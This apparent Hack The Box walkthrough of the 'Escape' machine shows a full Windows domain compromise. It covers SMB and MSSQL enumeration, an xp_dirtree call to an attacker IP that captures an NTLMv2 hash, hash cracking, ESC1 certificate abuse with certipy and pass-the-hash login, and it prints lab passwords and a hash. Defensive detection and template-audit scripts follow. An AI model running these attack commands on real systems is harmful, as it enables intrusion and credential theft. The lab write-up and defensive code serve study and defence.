# Escape

February 28, 2025
Created by: Geiseric · Page: Hack The Box · Difficulty: Medium · OS: Windows

The first step is to scan for open ports and then enumerate the versions and technologies running on them.

```bash
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.202 -oG scan
# helper script that pulls the open ports out of the grepable scan output
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49709,49720 -sCV -Pn 10.10.11.202 -oN ports
```

The scan reveals the domain sequel.htb, which I add to the hosts file.

Whenever I see a DNS service open, I query the mail (MX) records; here that turns up another domain name, which I also add to the hosts file.

```bash
dig @10.10.11.202 sequel.htb mx
```

Next I enumerate the SMB shares with the guest account.

```bash
netexec smb 10.10.11.202 -u guest -p "" --shares
```

Since I have read access to the IPC$ share, I can enumerate the domain users.

```bash
impacket-lookupsid sequel.htb/Guest@10.10.11.202
```

I also have read access to the Public share, so I connect to it and find a PDF file.

```bash
smbclient -U guest \\\\10.10.11.202\\Public
```

Inside the document there are credentials for Microsoft SQL Server. I log in and look through the tables for anything interesting, but find nothing remarkable, and I am not able to execute system commands through the database either.

```bash
impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.10.11.202
```

Having found nothing in the tables, I leave Responder listening on my interface and run a query that makes the SQL server connect back to my IP, which captures the NTLMv2 hash of the service account.

```sql
EXEC master..xp_dirtree "\\10.10.14.24\share\"
```

I crack the hash and recover the clear-text password of the sql_svc user.

```bash
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --show
```

With this user I connect to the system over WinRM, and while enumerating it I find a SQL Server log file that contains the credentials of the user Ryan.Cooper in clear text.

```bash
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
```

With Ryan.Cooper's credentials I enumerate the certificate templates and find one that is vulnerable to an ESC1 attack.

```bash
certipy-ad find -u Ryan.Cooper -p NuclearMosquito3 -dc-ip 10.10.11.202 -stdout -enabled -vulnerable
```

Following the steps to exploit ESC1, I request a certificate for the administrator UPN and obtain a .pfx file that can be used to authenticate to the system.

```bash
certipy-ad req -u Ryan.Cooper@sequel.htb -p "NuclearMosquito3" -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.202
```

Authenticating with the certificate yields the administrator's NT hash.

```bash
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.202
```

With this hash I connect to the system and read the second flag.

```bash
evil-winrm -i 10.10.11.202 -u Administrator -H a52f78e4c751e5f5e17e1e9f3e58f4ee
```
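The xp_dirtree step above works because the stored procedure makes the SQL Server service account open whatever path it is given, and a UNC path pointing at an attacker-controlled host turns that into an outbound SMB authentication. The following detection sketch is an added example, not part of the original writeup or of any vendor tooling: it parses constructed SQL audit records (timestamp, login and statement separated by tabs, a format assumed here for simplicity) and flags path-dereferencing procedures whose target is an unknown SMB host or an IP literal. The allowlisted file server name `fs01.sequel.htb` is a hypothetical value.

```python
"""Flag T-SQL statements that force SQL Server to authenticate to a remote SMB host.

Added example; the log format and the allowlist below are assumptions, and the
sample records are constructed, not captured from a real server.
"""
import ipaddress
import re

# Procedures that dereference the path they are given; for a UNC path this means
# the service account authenticates outbound over SMB to the named host.
PATH_DEREF_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")

PROC_RE = re.compile(r"\b(" + "|".join(PATH_DEREF_PROCS) + r")\b", re.IGNORECASE)
# First hop of a UNC path: \\host\ (or \\host at end of the argument)
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)(?:\\|$)")

# Hypothetical allowlist of file servers the database is expected to reach.
KNOWN_FILE_SERVERS = {"fs01.sequel.htb"}


def parse_line(line: str) -> dict:
    """Assumed audit format: ISO timestamp, login and statement, tab-separated."""
    ts, login, stmt = line.rstrip("\n").split("\t", 2)
    return {"ts": ts, "login": login, "statement": stmt}


def unc_host(statement: str):
    m = UNC_RE.search(statement)
    return m.group(1) if m else None


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(event: dict):
    """Return a finding for a path-dereferencing call with a UNC target, else None."""
    proc = PROC_RE.search(event["statement"])
    if not proc:
        return None
    host = unc_host(event["statement"])
    if host is None:
        return None  # local path: no outbound authentication happens
    reasons = []
    if host.lower() not in KNOWN_FILE_SERVERS:
        reasons.append("SMB target is not a known file server")
    if is_ip_literal(host):
        # An IP-literal UNC cannot be resolved to a Kerberos SPN, so the client
        # falls back to NTLM, which is what a hash-capture listener relies on.
        reasons.append("IP-literal UNC path forces NTLM authentication")
    return {
        "ts": event["ts"],
        "login": event["login"],
        "proc": proc.group(1).lower(),
        "host": host,
        "severity": "high" if reasons else "info",
        "reasons": reasons,
    }


def detect(lines):
    """Run the classifier over raw audit lines and keep only the findings."""
    return [f for f in (classify(parse_line(line)) for line in lines) if f]


# Constructed sample records (tab-separated), not real audit output.
SAMPLE_LOG = [
    "\t".join(["2025-02-08T13:40:14Z", "PublicUser",
               r'EXEC master..xp_dirtree "\\10.10.14.24\share\"']),
    "\t".join(["2025-02-08T13:41:02Z", "backup_job",
               r"EXEC master..xp_dirtree '\\fs01.sequel.htb\backups\'"]),
    "\t".join(["2025-02-08T13:41:30Z", "PublicUser", "SELECT name FROM sys.tables"]),
    "\t".join(["2025-02-08T13:42:11Z", "app_user",
               r"EXEC master..xp_fileexist 'C:\temp\x.txt'"]),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The low-privilege login calling xp_dirtree with an IP-literal UNC target is reported as high severity, while the same procedure pointed at the allowlisted backup server is only logged. On a real deployment the source would be a SQL Server Audit or Extended Events session capturing statement text, and the mitigation that removes the exposure entirely is revoking EXECUTE on these procedures from logins that do not need them.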
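The ESC1 finding that the certipy output reports is the conjunction of several template settings, and a defender can audit for the same combination offline. The script below is an added example, not code from the writeup or from Certipy: it evaluates the ESC1 preconditions over template records that mirror the LDAP attributes (`msPKI-Certificate-Name-Flag`, `msPKI-Enrollment-Flag`, `msPKI-RA-Signature`, `pKIExtendedKeyUsage` and the enrollment ACL) and shows which single setting breaks the chain. The template inventory is constructed; the record named `UserAuthentication` borrows the name from the writeup but its attribute values are assumptions, as are the other three templates.

```python
"""Offline audit of AD CS certificate templates for the ESC1 misconfiguration.

Added example, not Certipy's code. The template records are constructed to
resemble the LDAP attributes a template exposes; no real domain was queried.
"""
from __future__ import annotations

from dataclasses import dataclass, replace

# Bit values from msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester supplies subject / SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval"

# EKUs that make a certificate usable for domain authentication.
CLIENT_AUTH_EKUS = frozenset({
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
})

# Enrollment rights for these principals mean any domain account can enroll.
LOW_PRIV_PRINCIPALS = frozenset({"Domain Users", "Domain Computers",
                                 "Authenticated Users", "Everyone"})


@dataclass(frozen=True)
class Template:
    name: str
    enabled: bool                      # published in a CA's certificateTemplates
    name_flag: int                     # msPKI-Certificate-Name-Flag
    enrollment_flag: int               # msPKI-Enrollment-Flag
    ra_signatures: int                 # msPKI-RA-Signature
    ekus: frozenset[str]               # pKIExtendedKeyUsage; empty = any purpose
    enroll_principals: frozenset[str]  # principals with Enroll / AutoEnroll rights


def esc1_checks(t: Template) -> dict[str, bool]:
    """Each ESC1 precondition; the template is abusable only when all are True."""
    return {
        "published": t.enabled,
        "low_priv_enroll": bool(t.enroll_principals & LOW_PRIV_PRINCIPALS),
        "no_manager_approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_signatures_required": t.ra_signatures == 0,
        "client_auth_eku": not t.ekus or bool(t.ekus & CLIENT_AUTH_EKUS),
        "enrollee_supplies_subject": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
    }


def is_esc1_vulnerable(t: Template) -> bool:
    return all(esc1_checks(t).values())


def remediation(t: Template) -> list[str]:
    """Configuration changes that each, on their own, break the ESC1 chain."""
    fixes = []
    if t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        fixes.append("clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT so the subject is built from AD")
    if not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS):
        fixes.append("set CT_FLAG_PEND_ALL_REQUESTS to require manager approval")
    broad = t.enroll_principals & LOW_PRIV_PRINCIPALS
    if broad:
        fixes.append("remove Enroll rights from " + ", ".join(sorted(broad)))
    return fixes


def harden(t: Template) -> Template:
    """Return a copy with the subject-supplied flag cleared and approval required."""
    return replace(t,
                   name_flag=t.name_flag & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
                   enrollment_flag=t.enrollment_flag | CT_FLAG_PEND_ALL_REQUESTS)


def audit(templates) -> list[str]:
    """Names of the templates that satisfy every ESC1 precondition."""
    return [t.name for t in templates if is_esc1_vulnerable(t)]


# Constructed inventory (assumed values, not dumped from any domain).
TEMPLATES = [
    Template("UserAuthentication", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
    # subject is built from the AD object, so the requester cannot pick a UPN
    Template("User", True, 0, 0, 0,
             frozenset({"1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"}), frozenset({"Domain Users"})),
    # requester supplies the subject, but only server-auth EKU and admins-only enrollment
    Template("WebServer", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
             frozenset({"1.3.6.1.5.5.7.3.1"}), frozenset({"Domain Admins"})),
    # identical to the first template except that manager approval is required
    Template("Approved", True, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, CT_FLAG_PEND_ALL_REQUESTS, 0,
             frozenset({"1.3.6.1.5.5.7.3.2"}), frozenset({"Domain Users"})),
]

if __name__ == "__main__":
    for name in audit(TEMPLATES):
        t = next(t for t in TEMPLATES if t.name == name)
        print(name, esc1_checks(t), remediation(t))
```

Feeding it real data means exporting the template objects from `CN=Certificate Templates,CN=Public Key Services,CN=Services` in the configuration partition (or the JSON that Certipy writes) and mapping the attributes onto `Template`. The `harden` helper shows that flipping either of two settings is enough: once the CA builds the subject from the account or a manager must approve the request, a low-privilege user can no longer mint a certificate for another principal's UPN.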